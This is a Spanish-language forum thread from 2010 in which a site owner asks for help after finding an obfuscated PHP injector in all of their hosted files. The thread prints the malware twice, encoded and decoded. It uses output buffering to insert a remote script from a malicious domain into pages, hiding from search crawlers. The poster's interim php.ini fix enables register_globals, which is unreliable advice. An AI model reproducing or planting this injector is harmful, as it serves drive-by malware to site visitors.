Me Hackearon mis sitios

Mogk · #1 (**permalink**) 24/04/2010, 12:26

Hola a todos,, hoy en medio de clases entre a mi sitio, me redirecciona a un sitio y veo que me intenta hacer descargar un virus.

Veo el codigo fuente y encuentro

Código HTML:

<script src="httpcechirecom(.)com/js.php"></script>

(al parecer es un dominio registrado en China
cerre todo y sali corriendo para mi casa a solucionarlo

viendo uno de los .php con problema me encuentro con este codigo

Código PHP:

  <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5alpXTm9hWEpsWTI5dExtTnZiUzlxY3k1d2FIQWlQand2YzJOeWFYQjBQZz09Iik7ICAgICAgfSAgICAgIHJldHVybiAiIjsgICAgIH0gICAgfSAgICAgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ICAgICBmdW5jdGlvbiBnemRlY29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDKXsgICAgICAkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEPUBvcmQoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDMsMSkpOyAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9MTA7ICAgICAgJFJBM0Q1MkU1MkE0ODkzNkNERTBGNTM1NkJCMDg2NTJGMj0wOyAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmNCl7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?>

pero lo que mas me preocupa es que esta en todos los .php que encontre
y tengo al menos 25 directorios principales.
intente remplazar algunos pero me los modificaba rapidamente

¿alguna idea de como lo hace?
entra por ftp?

por ahora lo controle con php5.ini

Código:

register_globals = On

disable_functions = dir,readdir,sacndir,phpinfo,exec,proc_open,val,base64_decode

Tengo todo hosteado en Godaddy y tengo para varios dias de trabajo

seba_100 · #2 (**permalink**) 24/04/2010, 13:10

una solucion.... tenes buckup??... si lo tenes cambia de hosting... o hacete otra web .. y hace que la web vieja valla a la nueva... o no

Mogk · #3 (**permalink**) 24/04/2010, 13:18

no se borro nada, por lo que vi
solo se agrego ese codigo.
igual contraseñas y todo eso las voy a cambiar de inmediato.

osea arreglarlo lo puedo arreglar
Quiero saber si todavia esta y como hace para navegar por mis directorios buscando .php

Vitesse92 · #4 (**permalink**) 24/04/2010, 13:45

limpias variables ?? se ve como xss ! :S

Mogk · #5 (**permalink**) 24/04/2010, 14:12

si, aunque tengo tantas cosas online, que pienso que pudo entrar por algo de cuando empezaba.

Alguien encuentra aca algo que haga que se duplique?

Código PHP:

  if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ 
$GLOBALS['mr_no']=1; if(!function_exists('mrobh')){ 
if(!function_exists('gml')){ function gml(){ if 
(!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& 
(!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return 
base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9jZWNoaXJlY29tLmNvbS9qcy5waHAiPjwvc2NyaXB0Pg=="); 
} return ""; } } if(!function_exists('gzdecode')){ function 
gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ 
$R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); 
$RBE4C4D037E939226F65812885A53DAD9=10; 
$RA3D52E52A48936CDE0F5356BB08652F2=0; 
if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ 
$R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); 
$R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; 
$RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; 
} if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ 
$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; 
} if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ 
$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; 
} if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ 
$RBE4C4D037E939226F65812885A53DAD9+=2; } 
$R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); 
if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ 
$R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; 
} return $R034AE2AB94F99CC81B389A1822DA3353; } } function 
mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: 
none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); 
if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ 
return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); 
}else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } 
ob_start('mrobh'); } }

GatorV · #6 (**permalink**) 24/04/2010, 15:41

Como ya comente en un post anterior, esto es causado por un virus, tienes que contactar a tu hosting y decirles que tienen que limpiar su server.